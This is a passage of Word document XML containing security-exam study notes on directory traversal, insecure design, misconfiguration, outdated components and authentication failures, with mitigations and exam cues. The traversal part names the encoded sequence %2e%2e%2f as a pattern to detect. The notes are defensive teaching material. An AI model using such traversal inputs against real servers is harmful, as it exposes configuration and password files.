    <w:p w14:paraId="32D49063" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>URL-encoded sequences: %2e%2e%2f representing ../.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB4067A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586927FF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Read sensitive files (config, password files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55304BE2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sometimes used as part of file inclusion or RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC0CAC" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDEE7B7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Normalize and validate paths: only allow filenames from a whitelist or fixed directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C5164" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Never concatenate raw user input into file paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B312F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use OS APIs that restrict to specific directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AB954" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Apply least privilege to file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544C2E1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (directory traversal)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4F2DA" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>../ or encoded equivalents in URLs or file parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515691E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input validation on file paths, canonicalization, allowlist of files</w:t>
      </w:r>
      <w:r>
        <w:t>, not “encrypt file” or “use HTTPS.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E6829" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239EB294" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Insecure design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35AEC3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E1DE6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The overall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>architecture or logic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is flawed, even if the code has no traditional bugs. The app was not designed with security in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394DB6BB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567E3EB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No rate limiting on critical actions (e.g., password reset brute force).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FB338" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Business logic that allows unlimited transfers or discounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB4721" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Relying solely on client-side logic for security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4AA62" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9952EE" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Threat modeling early in SDLC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F72CB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure design reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B392CF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security requirements as first-class citizens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1410D3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use secure framework patterns and defense-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D651A2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (insecure design)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11068BAC" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Business logic allows X,” “no rate limiting,” “security added only at the end,” “no threat modeling.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328F477" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The right control: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secure SDLC, threat modeling, design reviews</w:t>
      </w:r>
      <w:r>
        <w:t>, not just “patching” or “firewall.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15374ECD" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D6D296" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Security misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D597C3E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D000F66" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">System/app is deployed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsafe default or incorrect configuration</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B6A5C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C2F01" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Default admin/admin credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73FC33" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Directory listing enabled on web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F0B44" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unused ports/services left open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16800845" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Debug mode enabled in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA0D5E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FA1DF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Harden systems based on baselines (CIS benchmarks, STIG).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1AFDD" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable unnecessary features/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4B8E9" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change default passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31966D6E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Automated configuration management and regular reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0E3EF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (security misconfiguration)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6532E6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Default password,” “debug mode,” “directory browsing,” “sample apps still deployed.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E6AC3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hardening, secure configuration baseline, disabling unused services, config management</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60328012" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C682C73" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. End-of-life (EOL) or outdated components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DFF90" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1EB3C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Using software that is no longer supported (no patches) or severely outdated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A5848" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Risks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C982D3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Known vulnerabilities remain unpatched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC82C3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Often cannot meet compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D214FD3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32003B74" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade or replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> supported versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF596E6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If upgrade not possible: isolate system (network segmentation), restrict access, add compensating controls, heavy monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAD383" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fixed by antivirus or “just patch it” because patches no longer exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181403F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (EOL)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AB42A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“OS no longer receives security updates,” “unsupported library version,” “legacy system.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E6BBA" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correct answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade/replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>segmentation + compensating controls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if replacement not possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E78874" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626A815C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Identification and authentication failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1A19B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D18277" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Anything wrong with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logging in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and verifying identity: weak password policies, missing lockout, flawed session handling, predictable tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86C9D4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF97F23" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No account lockout after many failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F5999" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password reset via easily guessable questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D3467" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Session IDs in URL; predictable or not invalidated on logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F800386" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MFA not used for sensitive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13F6AF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB6A98" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Strong password policies; account lockout/brute-force protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F652CF2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MFA (especially for admin &amp; sensitive functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A370C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secure session management (random, long, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Secure cookies; invalidate on logout; regeneration on privilege change).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569EC05E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Secure password reset flows (email links, MFA, tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2346BD67" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (ID/auth failures)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCD76E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Unlimited login attempts,” “predictable session IDs,” “no MFA,” “weak password reset.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12418DF3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>strong auth, lockout, MFA, session security</w:t>
      </w:r>
      <w:r>
        <w:t>, not “data encryption.”</w:t>
